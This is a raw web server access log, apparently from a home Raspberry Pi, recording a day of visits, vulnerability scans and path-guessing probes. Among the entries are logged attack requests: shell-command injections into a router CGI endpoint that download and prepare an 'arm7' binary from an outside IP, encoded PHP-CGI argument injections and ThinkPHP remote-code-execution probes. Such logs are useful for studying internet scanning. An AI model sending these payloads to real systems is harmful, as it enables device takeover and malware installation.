Mon Apr 13 06:25:14 MDT 2020 06:25:14 up 48 days, 10:53, 1 user, load average: 0.41, 0.27, 0.21 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 48days 1:11m 2.34s /usr/bin/lxsession -s LXDE-pi -e LXDE 72.253.1.117 - - [13/Apr/2020:12:33:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 177.11.136.89 - - [13/Apr/2020:12:52:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 96.65.238.54 - - [13/Apr/2020:13:10:46 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET" 96.65.238.54 - - [13/Apr/2020:13:10:47 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.153.197.103 - - [13/Apr/2020:13:21:07 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.153.197.103 - - [13/Apr/2020:13:27:29 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.58.86 - - [13/Apr/2020:13:42:38 +0000] "GET /_cat/indices?bytes=b&format=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" 75.148.156.244 - - [13/Apr/2020:14:23:34 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 75.148.156.244 - - [13/Apr/2020:14:23:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 219.154.124.144 - - [13/Apr/2020:15:01:56 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 128.65.170.144 - - [13/Apr/2020:15:25:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 84.20.85.217 - - [13/Apr/2020:16:01:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 80.82.77.139 - - [13/Apr/2020:16:16:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 80.82.77.139 - - [13/Apr/2020:16:16:33 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "" 80.82.77.139 - - [13/Apr/2020:16:16:33 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "" "" 80.82.77.139 - - [13/Apr/2020:16:16:33 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" "" 80.82.77.139 - - [13/Apr/2020:16:16:35 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "python-requests/2.23.0" 208.91.109.18 - - [13/Apr/2020:17:58:49 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [13/Apr/2020:17:58:49 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 103.237.76.99 - - [13/Apr/2020:18:15:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 69.246.5.103 - - [13/Apr/2020:18:31:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 69.246.5.103 - - [13/Apr/2020:18:31:59 +0000] "GET / HTTP/1.1" 200 25000 "" "" 157.245.171.105 - - [13/Apr/2020:18:32:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" 5.196.65.217 - - [13/Apr/2020:18:32:25 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 5.234.232.229 - - [13/Apr/2020:18:44:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 5.234.232.229 - - [13/Apr/2020:18:44:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.243.130.203 - - [13/Apr/2020:18:46:58 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 51.254.59.113 - - [13/Apr/2020:19:10:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:20 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:20 +0000] "GET /delinquent-accounts/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:21 +0000] "GET /documents/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:21 +0000] "GET /downloads/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:22 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:23 +0000] "GET /memes/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:23 +0000] "GET /music/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:24 +0000] "GET /pictures/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:24 +0000] "GET /va/ HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:25 +0000] "GET /videos/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:25 +0000] "GET /ac0xl/ac0xl/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:27 +0000] "GET /ac0xl/ac0xl/Dont-Be-Evil/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:27 +0000] "GET /ac0xl/ac0xl/illuminati/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:28 +0000] "GET /ac0xl/ac0xl/logs/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:28 +0000] "GET /ac0xl/ac0xl/www/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:29 +0000] "GET /delinquent-accounts/delinquent-accounts/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:29 +0000] "GET /delinquent-accounts/delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:30 +0000] "GET /documents/documents/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:30 +0000] "GET /downloads/downloads/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:31 +0000] "GET /downloads/downloads/4laws.com/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:31 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:32 +0000] "GET /freedom/freedom/freedom/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:32 +0000] "GET /freedom/freedom/freedom-2020-01-08/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:33 +0000] "GET /memes/memes/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:33 +0000] "GET /music/music/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:34 +0000] "GET /music/music/Songs/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:34 +0000] "GET /pictures/pictures/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:35 +0000] "GET /pictures/pictures/StMichaelTheArchangelMission/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:35 +0000] "GET /videos/videos/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:36 +0000] "GET /freedom/freedom/freedom/freedom/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [13/Apr/2020:19:10:36 +0000] "GET /freedom/freedom/freedom/freedom/thttpd-extras/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 96.80.89.253 - - [13/Apr/2020:19:37:09 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 96.80.89.253 - - [13/Apr/2020:19:37:10 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 177.38.182.40 - - [13/Apr/2020:20:17:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:24:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 49.232.40.196 - - [13/Apr/2020:20:24:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:24:04 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:24:05 +0000] "POST /Admin0713faa2/Login.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:24:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:24:08 +0000] "GET /l.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:24:09 +0000] "GET /phpinfo.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:24:11 +0000] "GET /test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:24:12 +0000] "POST /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0" 49.232.40.196 - - [13/Apr/2020:20:24:13 +0000] "POST /bbs.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0" 49.232.40.196 - - [13/Apr/2020:20:24:15 +0000] "POST /forum.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0" 49.232.40.196 - - [13/Apr/2020:20:24:19 +0000] "POST /bbs/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0" 49.232.40.196 - - [13/Apr/2020:20:24:20 +0000] "POST /forum/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0" 49.232.40.196 - - [13/Apr/2020:20:24:21 +0000] "POST /forums/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0" 49.232.40.196 - - [13/Apr/2020:20:24:23 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+% HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0" 49.232.40.196 - - [13/Apr/2020:20:24:24 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0" 49.232.40.196 - - [13/Apr/2020:20:24:31 +0000] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0" 49.232.40.196 - - [13/Apr/2020:20:24:47 +0000] "GET /java.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:24:51 +0000] "GET /test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:24:55 +0000] "GET /db_pma.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:24:59 +0000] "GET /help-e.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:00 +0000] "GET /license.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:03 +0000] "GET /hell.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:11 +0000] "GET /shell.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:12 +0000] "GET /htdocs.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:19 +0000] "GET /desktop.ini.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:20 +0000] "GET /z.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:21 +0000] "GET /lala.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:23 +0000] "GET /wpc.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:27 +0000] "GET /t6nv.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:31 +0000] "GET /text.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:32 +0000] "GET /wp-config.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:33 +0000] "GET /muhstik.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:33 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 49.232.40.196 - - [13/Apr/2020:20:25:36 +0000] "GET /muhstiks.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:37 +0000] "GET /muhstik-dpr.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:37 +0000] "GET /lol.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:39 +0000] "GET /cmd.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:43 +0000] "GET /cmdd.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:44 +0000] "GET /knal.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:45 +0000] "GET /cmd.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:25:46 +0000] "GET /shell.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:00 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:00 +0000] "GET /scripts/db___.init.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:04 +0000] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:05 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:06 +0000] "GET /PMA/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:08 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:09 +0000] "GET /pma/scripts/db___.init.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:10 +0000] "GET /PMA/scripts/db___.init.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:10 +0000] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:11 +0000] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:12 +0000] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:19 +0000] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 49.232.40.196 - - [13/Apr/2020:20:26:20 +0000] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&var HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 